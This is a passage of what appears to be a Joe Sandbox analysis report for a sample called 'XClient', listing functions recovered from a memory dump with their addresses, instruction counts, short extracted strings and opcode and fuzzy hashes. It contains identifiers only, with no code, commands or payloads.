Instruction ID: ef6de585c8f03733248ca4956f173f645a7678bfa76897a210b7c1ab3366791b
Opcode Fuzzy Hash: 086a66a3ec0ce7e8e5f9421b540f914416bec21fb1518035ede92051e95858d3
Instruction Fuzzy Hash: 6EE1B330A09A8E9FEBA8EF28C8557F97BD1EB54310F14426ED84DC72A5DF7499408B81

Function 00007FFD9B7C0F6D Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

SAP_^, xrefs: 00007FFD9B7C0FB1

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID: SAP_^
API String ID: 0-3471593181
Opcode ID: 19d62dc1a3af591d36faa149cb1583c37248a3e13095c6d458f0c585b1ec10c2
Instruction ID: b326d22da561924ac0652f234e6cca50935ca1fe48776ebbe06790b473ed1893
Opcode Fuzzy Hash: 19d62dc1a3af591d36faa149cb1583c37248a3e13095c6d458f0c585b1ec10c2
Instruction Fuzzy Hash: 3FA1C421B1DA491BE7A8FB6C4875679B7D2EF98300F4546BDE04DC33E6DE28A9414381

Function 00007FFD9B7C7ECD Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

u>]I, xrefs: 00007FFD9B7C7F94

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID: u>]I
API String ID: 0-1397071109
Opcode ID: 64e1d5c7302785913749a0e925c79bb4c886ad3d02f66a7a4dbdaf67232b236c
Instruction ID: 438ac725634e1f10505f4f6fa6ee44ad35289ad796fb7a88f36ae0adae54ad4c
Opcode Fuzzy Hash: 64e1d5c7302785913749a0e925c79bb4c886ad3d02f66a7a4dbdaf67232b236c
Instruction Fuzzy Hash: D8510522E0E7D62FD712EB7854B55E87FA0EF5221870A41FFC099CB1E7DE04690A8395

Function 00007FFD9B7C835D Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B7C83D3

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: da79075725bde71c148ad1908c4b26a0e6d865866c23be2fc11315142571bc49
Instruction ID: 75374fc620d4732380a72dd100c3b7f8c1444fbab427aba6634d2a4becd56e8c
Opcode Fuzzy Hash: da79075725bde71c148ad1908c4b26a0e6d865866c23be2fc11315142571bc49
Instruction Fuzzy Hash: 50212731D0935A4FDB10AFE4C8556FABBF0EF46314F0602BFD899D32A1CB28564587A1

Function 00007FFD9B7C1B91 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

SAP_^, xrefs: 00007FFD9B7C1BD6

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID: SAP_^
API String ID: 0-3471593181
Opcode ID: 673cafede31c5ee02931b7b59f60c28a3a51ff01157bbba51f9348a81a97e293
Instruction ID: d8e353f3c445eea16b4004e46a227b8d502e1a47dc22c06fc8947e98e37176f0
Opcode Fuzzy Hash: 673cafede31c5ee02931b7b59f60c28a3a51ff01157bbba51f9348a81a97e293
Instruction Fuzzy Hash: 2211E421F0F78A1BF326B77948314B83BA16F82650F4A42BDD059C66F3ED1C69068392

Function 00007FFD9B7C27E8 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B7C83D3

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 027759c7383bdf1bc0fb4299e9b701c028114c75bac7bd7d2ce1478cb7776150
Instruction ID: 59df53df3a6d180cf15edc493e2a3f7ab9b9345ded41f1399641660b1f2dcc7b
Opcode Fuzzy Hash: 027759c7383bdf1bc0fb4299e9b701c028114c75bac7bd7d2ce1478cb7776150
Instruction Fuzzy Hash: B111A531E0961E5AEB24BFE884156FEB6A0EF44305F02023ED95DE33B0DF3967408691

Function 00007FFD9B7C1BF8 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

SAP_^, xrefs: 00007FFD9B7C1BD6

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID: SAP_^
API String ID: 0-3471593181
Opcode ID: 5a32a212680affca1cf715ceef10aa0369ff612d10b5f4323b0e92fcb31ee458
Instruction ID: 6f96468955162bee28c848b402d914d898dda40f5f42baa0afc71c035a062694
Opcode Fuzzy Hash: 5a32a212680affca1cf715ceef10aa0369ff612d10b5f4323b0e92fcb31ee458
Instruction Fuzzy Hash: FEF0D630E0D60AABE335FB59846167833B2AB85310F51477CE01DC27F6DF28B9418681

Function 00007FFD9B7C6DC6 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f727acf5301a83660fcb2082d4002dd7a4bd96b9e1673e3e9e3b976c1ca1f79b
Instruction ID: da10d72fe709f04b0d43f41cfffcbb460e1d094f2ecc34566e7a8eac4e9ee511
Opcode Fuzzy Hash: f727acf5301a83660fcb2082d4002dd7a4bd96b9e1673e3e9e3b976c1ca1f79b
Instruction Fuzzy Hash: D7B1A330609B8D4FEBA9EF28D8557F93BD1EF55310F04426EE84DC72A6CA3499458B82

Function 00007FFD9B7C2CB0 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7de82983749ed35d9afdb4906aad9bbf2265b358684f4bf960f2d2d111e09c0
Instruction ID: 028bf4e6090b24c6a82f03943ded8330266c3a94aec9b73777948b5d73a3f2b2
Opcode Fuzzy Hash: d7de82983749ed35d9afdb4906aad9bbf2265b358684f4bf960f2d2d111e09c0
Instruction Fuzzy Hash: 1391C624B1894D5BE788B7AC947AB7DB2D6EFD8300F5141B9E00DC33EACD68B8414352

Function 00007FFD9B7C0758 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446da90b94a420a69d8378629bf569310fb2cc8eded65fdd7c45bf4e2b03c168
Instruction ID: 5c1842efa99b39884a2da69e375d8986f7814d5e0f7cbccd59ade9de19ce1573
Opcode Fuzzy Hash: 446da90b94a420a69d8378629bf569310fb2cc8eded65fdd7c45bf4e2b03c168
Instruction Fuzzy Hash: 4D812771F0EA4E1FE768FB6888656B577E1EF44310F4506BED00DC72E6DE28A9468381

Function 00007FFD9B7C0718 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec8834f85712702e517f34c4685cb05959f804a42c3feece4db89db1befd3bb
Instruction ID: 19c79be00ed6a464aa4b7d3ba1888cd9661f35d16d590064aec0e48d0998ca51
Opcode Fuzzy Hash: 1ec8834f85712702e517f34c4685cb05959f804a42c3feece4db89db1befd3bb
Instruction Fuzzy Hash: 1F810361B09A4D5BE7A8EB6C54786BD72D2EF98310F15067DE05EC33E6DE286D028780

Function 00007FFD9B7C8FED Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c5931085aa3e6f1c969ee80e6a0bf372159a6d919cad65c13c2389b23eb797
Instruction ID: 9a33f123a4cd13839352e01d6a4ef2466f66d9a0c0ce241fb4ca611d4b14df46
Opcode Fuzzy Hash: c7c5931085aa3e6f1c969ee80e6a0bf372159a6d919cad65c13c2389b23eb797
Instruction Fuzzy Hash: B5810731B09A4D5FDBA5EB789869AF977E1EF49310F05027EE00DD32F2CE28A9418741

Function 00007FFD9B7C22B9 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff765fc33eb325f70ca344878a19592bd2ee812c137234b7d2cec9faa55140c1
Instruction ID: 6be741b628a8d962823aa9384f3f0bc58541d9436ddb89f7793ceb5fb40b33f3
Opcode Fuzzy Hash: ff765fc33eb325f70ca344878a19592bd2ee812c137234b7d2cec9faa55140c1
Instruction Fuzzy Hash: E9712661F09A4D5FE7A8EB6844746B977D1EF98310F5506BDE04AC33E6DE286D028380

Function 00007FFD9B7C9040 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b7662793b903ae437f5857bbb96fe1b7beb61bb6dcbf98cda3b28bbc8edb96d
Instruction ID: ee69ac5934ae5032aa18871110215cf0f052ad1ab0eac8c66b6f22df317bbf3c
Opcode Fuzzy Hash: 2b7662793b903ae437f5857bbb96fe1b7beb61bb6dcbf98cda3b28bbc8edb96d
Instruction Fuzzy Hash: DB61C431B1990D5FDBA8EB68C4A9ABD77E2EF99310F05017DE01ED32E6CE24AD418741

Function 00007FFD9B7C8449 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94902cee586dde9ef2a6743277190588dca0de808b9a7d83f7f725796bf26e66
Instruction ID: ec3e181217af0cb4fe32c6983ede4732ee4f5f9b3848eca3e43b4d81a90b6a83
Opcode Fuzzy Hash: 94902cee586dde9ef2a6743277190588dca0de808b9a7d83f7f725796bf26e66
Instruction Fuzzy Hash: A4516130A18A4C4FDB58EF58D855BFDBBF1FF99310F1042AAD44DD3296DA34A9428B81

Function 00007FFD9B7C2B0A Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b310034701f0c3182ddf3d40517065f4388f05f8335d66c4c45274bfac44e63
Instruction ID: df3e8b65949c795bf3fdd155462eb6f88b40ee15a374da15124e8e4c0552d6d4
Opcode Fuzzy Hash: 7b310034701f0c3182ddf3d40517065f4388f05f8335d66c4c45274bfac44e63
Instruction Fuzzy Hash: 82510471A0D64D9FD758EFA8C865AB87BF0EF95311F0442BED049C32E2DB29A446C741

Function 00007FFD9B7C3CFC Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a01d11b9e6620981c65bb44a6f68e8b405285764d7f1cd4646ce4fd3847047
Instruction ID: 20c1ad0ef4573f7152cd0164b47b1ad081806aeac734b581e22a8266ffc2baba
Opcode Fuzzy Hash: 26a01d11b9e6620981c65bb44a6f68e8b405285764d7f1cd4646ce4fd3847047
Instruction Fuzzy Hash: 98517430A08B5C8FDB58EB58D855BE9BBF1FF59310F0082AAD44DD3256DF34A9858B81

Function 00007FFD9B7C2008 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51173c9089f370a37e02163cb7640e69fd310c92dc2fc7f227c930aca6e21154
Instruction ID: 40535fbddfed882c796f7fab1abb3bb11e1a94b9f71626278706a4bbe8fdf11a
Opcode Fuzzy Hash: 51173c9089f370a37e02163cb7640e69fd310c92dc2fc7f227c930aca6e21154
Instruction Fuzzy Hash: 83513930E0D78A5FE756EBB448216A57BA0EF16320F1902FED099C72F7CD686842C751

Function 00007FFD9B7C140D Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0136d473d2b681410e9aa07f89341b5aa65f0787b479abb906ce669acef7e4e1
Instruction ID: 17b09ddb5ff0af4498363d0779210543f8e0dc23acb3c7fd7c74a2431b9df6aa
Opcode Fuzzy Hash: 0136d473d2b681410e9aa07f89341b5aa65f0787b479abb906ce669acef7e4e1
Instruction Fuzzy Hash: CD512320B1DAC90FD79AAB7848796757BD1DF9A219B0805FEE08DC72E7DD185802C342

Function 00007FFD9B7C0740 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfb017120db4ee69488ad0c0572f5b6f5e2d301a293f57a5147d7eb482b0dfe
Instruction ID: 1404ce5ab05f936217ababc14c05e9297e23afb0a3957158195c1bcccbf9a4b4
Opcode Fuzzy Hash: dbfb017120db4ee69488ad0c0572f5b6f5e2d301a293f57a5147d7eb482b0dfe
Instruction Fuzzy Hash: 70514130F1991D9FEB94EB68D8A5ABCB3E2FF98304F514679E00DD32E5CE24A9418741

Function 00007FFD9B7C8D61 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a29896500a1c86e0b9353ad0bd0a40836e0fa5a7aa704237ab20e15651e827
Instruction ID: 7d7f6ad520cedda26b77b1b8abc22e1239a2d8398e407d3703c7f7182f6adeb9
Opcode Fuzzy Hash: 22a29896500a1c86e0b9353ad0bd0a40836e0fa5a7aa704237ab20e15651e827
Instruction Fuzzy Hash: 29519330B19A4D5FDB94EB68D461ABC77E1FF99304F4541B9E00DD32F6CE24A9418741

Function 00007FFD9B7C1D65 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10ec53aff5ca719604d0eb6b81fc285a799d4014b311eef6b62c34cf0b3f93f9
Instruction ID: ab0fb889682ed37f186d60a57bf6f9c4b79a3d96fd463c1ce79ad0540e76565b
Opcode Fuzzy Hash: 10ec53aff5ca719604d0eb6b81fc285a799d4014b311eef6b62c34cf0b3f93f9
Instruction Fuzzy Hash: 3C418074A09A1D8FDBA8EF68D469AB977E0FF55312F00017ED00AC3AA1CB75E841CB41

Function 00007FFD9B7C0BFE Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef91df0b734db30914d8906742ff6bc9a73e36accabfa5b757688265da3293f
Instruction ID: 5a09e994908a048cc2c5765b7637bd5aac7f996111e0d3148c066e5866e76213
Opcode Fuzzy Hash: 4ef91df0b734db30914d8906742ff6bc9a73e36accabfa5b757688265da3293f
Instruction Fuzzy Hash: 7A412A21B1DA4E0FE7A5AB7C58655B937D6DFD6214B4901FEE44DC32EBDC18AC028342

Function 00007FFD9B7C0780 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7b1defe6b33849713323968c446e8106c6a5b819c379242408f299e6aca98c
Instruction ID: 73f924dc85a78f2055203d2f9e905ee54b761e96452feadf118d735d4e2bf80c
Opcode Fuzzy Hash: bb7b1defe6b33849713323968c446e8106c6a5b819c379242408f299e6aca98c
Instruction Fuzzy Hash: 55414174A09A1D8FEBA8EF58D465ABD77E4FB55312F00017ED00AD3AA1CB75E841CB41

Function 00007FFD9B7C879D Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00a87da502d3f4ac72d92e023eced8d2bbcbfaa834aee07a81f1ec311dc9bee3
Instruction ID: 591b2792cb3b94ab21424fafa28fb749f9b33bbe6674d7026a1c7a8470975f51
Opcode Fuzzy Hash: 00a87da502d3f4ac72d92e023eced8d2bbcbfaa834aee07a81f1ec311dc9bee3
Instruction Fuzzy Hash: 3D419531B1AA4D5FDB94EBB884696FCBBF1EF59310B05057ED00DD32A2DF28A8418750

Function 00007FFD9B7C04C8 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e314a06aff6e79f858dde4f5e326c1371cfe837b8bb58076b4fa98e178760790
Instruction ID: 98fe291ed9e12ab052f6058392c5b16b47d47a81da4868897a80f3a67023b6d4
Opcode Fuzzy Hash: e314a06aff6e79f858dde4f5e326c1371cfe837b8bb58076b4fa98e178760790
Instruction Fuzzy Hash: 7D31D321B1C9490FE798EE6C546A679B6C2EF9C315F0505BEE04EC73E7DD64AC428341

Function 00007FFD9B7C0710 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d15ff31bc08ee6a6a0ea23bbadfdd0cd1639f109368e352c2a6ab73e992cea
Instruction ID: f74eebe34219a0c468e5ae433e7230160b7498d09b35d5ed404b4b212f98c1ce
Opcode Fuzzy Hash: 67d15ff31bc08ee6a6a0ea23bbadfdd0cd1639f109368e352c2a6ab73e992cea
Instruction Fuzzy Hash: 50419130F09A0E9BDBA8FBA884616BD73E1EF54314F55027DD01ED33E6CE28A9418741

Function 00007FFD9B7C0AB0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d661abec3cc111d143dcb812db814f4f014d7ec4ed9c1e663209662e97788957
Instruction ID: aa9d1a51a26b9baff1db47dcfe36ac4f5b19f73398ba9c01487723bb998def8a
Opcode Fuzzy Hash: d661abec3cc111d143dcb812db814f4f014d7ec4ed9c1e663209662e97788957
Instruction Fuzzy Hash: 6331E411F2890D1BEB98BBBC5869BBD72D6EF98B05F41027AE01DC33E6DD18684143D2

Function 00007FFD9B7C0949 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b767dde92734ee8ee36a86e1748221ca5269ffb31591ea8fe8c2313391fa7ba
Instruction ID: 51bc456ec75e62bcb2e7705bab9b3e3f1965972c26d2eb343d4308c75c8d580b
Opcode Fuzzy Hash: 5b767dde92734ee8ee36a86e1748221ca5269ffb31591ea8fe8c2313391fa7ba
Instruction Fuzzy Hash: AC31AD34B19A4E9FEB44EBA88875AEDBBA1FF98300F5505B9D019D33D6CE2868418741

Function 00007FFD9B7C8AA9 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4016ae5a5592a682058d5519b8cf672195b590a8f8036302b158123515f1d36a
Instruction ID: 3b6a39463681e2b9f2b4db87b545c0f27c585d3f5cdd79a363f47d387f9f64c7
Opcode Fuzzy Hash: 4016ae5a5592a682058d5519b8cf672195b590a8f8036302b158123515f1d36a
Instruction Fuzzy Hash: 0031D371B0EA4E5FE764BE7488696B5B7A1EF54300F0507BEE009C72A2DE28A9458381

Function 00007FFD9B7C9C95 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e9af95a294e23443928a647601961747aed42ef7d0d7e93bf976a5690252626
Instruction ID: d1535c39599fd9cb947f8c2518f4a55be2bd63798e5d6c5ca494d6cc8f7dc14a
Opcode Fuzzy Hash: 5e9af95a294e23443928a647601961747aed42ef7d0d7e93bf976a5690252626
Instruction Fuzzy Hash: D231903190D7488FDB69DBA8D849AE9BBF0FF56320F0482AFD089C7562D764A406CB51

Function 00007FFD9B7C8965 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3f6a58297c3074727f19e5edbbb646219e29adf3cf1514f4ae84ae9a6d54fe
Instruction ID: a0e5ef043a3384125bc59cb2968e87685c4aaa39f3992fc3e73569441d5495f8
Opcode Fuzzy Hash: 0b3f6a58297c3074727f19e5edbbb646219e29adf3cf1514f4ae84ae9a6d54fe
Instruction Fuzzy Hash: 8B312772E5E78E2FD755AB6498725FD7B71EF86200B4A02BAD009D62F3DD1C29028311

Function 00007FFD9B7C2543 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca09ceee6b63798194d1b39871bab1df933d8fc46833893a24fd4d5237e033bb
Instruction ID: ce407bbcf556abd01454abb1138d841c87ae3785d946904efd8e019d8653c6d1
Opcode Fuzzy Hash: ca09ceee6b63798194d1b39871bab1df933d8fc46833893a24fd4d5237e033bb
Instruction Fuzzy Hash: D4213822B1DA490BE768B66C24356BD72C2EBC8350B0503BEE08EC37E6DD185D024381

Function 00007FFD9B7C9BB9 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c29d5b2d62ff550b4fff7a3fac8cfc60858b84d9ee15ce85b36c0429c39947bf
Instruction ID: b35792cb8daa4e0bab8a275611cacdfbb89d46fd3986eb3daca051e1f762aca1
Opcode Fuzzy Hash: c29d5b2d62ff550b4fff7a3fac8cfc60858b84d9ee15ce85b36c0429c39947bf
Instruction Fuzzy Hash: 82213820B4E68E2FD752AB7448256F63BE5EFCA300B0542BAE089C72E3CD1C99428351

Function 00007FFD9B7C199B Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70a665ca772ec7c6d127df9c63e860e0e663555db2895421d2919b8e4798697
Instruction ID: 37eb651b578ec056e30c9e37e84127ea9c00b76537c3c79e17c64acff36ecc57
Opcode Fuzzy Hash: e70a665ca772ec7c6d127df9c63e860e0e663555db2895421d2919b8e4798697
Instruction Fuzzy Hash: 7121AC51E0F7C66BE72567B448351B87FA07F52254B0E41FFD0A8865F3D949A90C8382

Function 00007FFD9B7C0750 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

